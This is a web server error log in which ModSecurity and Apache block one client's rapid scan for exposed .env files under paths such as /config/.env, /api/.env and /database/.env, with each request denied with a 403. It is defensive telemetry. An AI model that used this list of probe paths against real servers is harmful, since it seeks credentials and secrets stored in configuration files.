[Thu Jan 01 09:26:31.791327 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/app/.env"] [unique_id "aVYvtyEFf7TT1LdjoKPHCgAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:31.791560 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/app/.env"] [unique_id "aVYvtyEFf7TT1LdjoKPHCgAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:31.791728 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/app/.env"] [unique_id "aVYvtyEFf7TT1LdjoKPHCgAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:31.874185 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/datavase/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/Datavase/.env"] [unique_id "aVYvtyEFf7TT1LdjoKPHCwAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:31.874445 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/Datavase/.env"] [unique_id "aVYvtyEFf7TT1LdjoKPHCwAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:31.874610 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/Datavase/.env"] [unique_id "aVYvtyEFf7TT1LdjoKPHCwAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:31.957013 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /database/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database/.env"] [unique_id "aVYvtyEFf7TT1LdjoKPHDAAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:31.957242 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database/.env"] [unique_id "aVYvtyEFf7TT1LdjoKPHDAAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:31.957395 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database/.env"] [unique_id "aVYvtyEFf7TT1LdjoKPHDAAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:32.039988 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aVYvuCEFf7TT1LdjoKPHDQAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:32.040241 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aVYvuCEFf7TT1LdjoKPHDQAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:32.040425 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aVYvuCEFf7TT1LdjoKPHDQAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:32.123055 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /assets/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/assets/.env"] [unique_id "aVYvuCEFf7TT1LdjoKPHDgAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:32.123294 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/assets/.env"] [unique_id "aVYvuCEFf7TT1LdjoKPHDgAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:32.123472 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/assets/.env"] [unique_id "aVYvuCEFf7TT1LdjoKPHDgAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:32.205663 2026] [authz_core:error] [pid 1117460] [client 54.75.202.236:53982] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/.env, referer: https://www.google.com/
[Thu Jan 01 09:26:32.288048 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /apps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aVYvuCEFf7TT1LdjoKPHEAAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:32.288288 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aVYvuCEFf7TT1LdjoKPHEAAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:32.288450 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aVYvuCEFf7TT1LdjoKPHEAAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:32.371175 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /uploads/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/uploads/.env"] [unique_id "aVYvuCEFf7TT1LdjoKPHEQAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:32.371402 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/uploads/.env"] [unique_id "aVYvuCEFf7TT1LdjoKPHEQAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:32.371543 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/uploads/.env"] [unique_id "aVYvuCEFf7TT1LdjoKPHEQAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:32.453997 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sitemaps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sitemaps/.env"] [unique_id "aVYvuCEFf7TT1LdjoKPHEgAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:32.454227 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sitemaps/.env"] [unique_id "aVYvuCEFf7TT1LdjoKPHEgAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:32.454417 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sitemaps/.env"] [unique_id "aVYvuCEFf7TT1LdjoKPHEgAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:32.536678 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /saas/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/saas/.env"] [unique_id "aVYvuCEFf7TT1LdjoKPHEwAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:32.536904 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/saas/.env"] [unique_id "aVYvuCEFf7TT1LdjoKPHEwAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:32.537055 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/saas/.env"] [unique_id "aVYvuCEFf7TT1LdjoKPHEwAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:32.619545 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aVYvuCEFf7TT1LdjoKPHFAAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:32.619772 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aVYvuCEFf7TT1LdjoKPHFAAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:32.619957 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aVYvuCEFf7TT1LdjoKPHFAAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:32.704115 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /psnlink/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/psnlink/.env"] [unique_id "aVYvuCEFf7TT1LdjoKPHFQAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:32.704347 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/psnlink/.env"] [unique_id "aVYvuCEFf7TT1LdjoKPHFQAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:32.704520 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/psnlink/.env"] [unique_id "aVYvuCEFf7TT1LdjoKPHFQAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:32.787513 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /exapi/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/exapi/.env"] [unique_id "aVYvuCEFf7TT1LdjoKPHFgAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:32.787772 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/exapi/.env"] [unique_id "aVYvuCEFf7TT1LdjoKPHFgAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:32.787944 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/exapi/.env"] [unique_id "aVYvuCEFf7TT1LdjoKPHFgAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:32.870563 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /site/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aVYvuCEFf7TT1LdjoKPHFwAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:32.870807 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aVYvuCEFf7TT1LdjoKPHFwAAAAc"], referer: https://www.google.com/
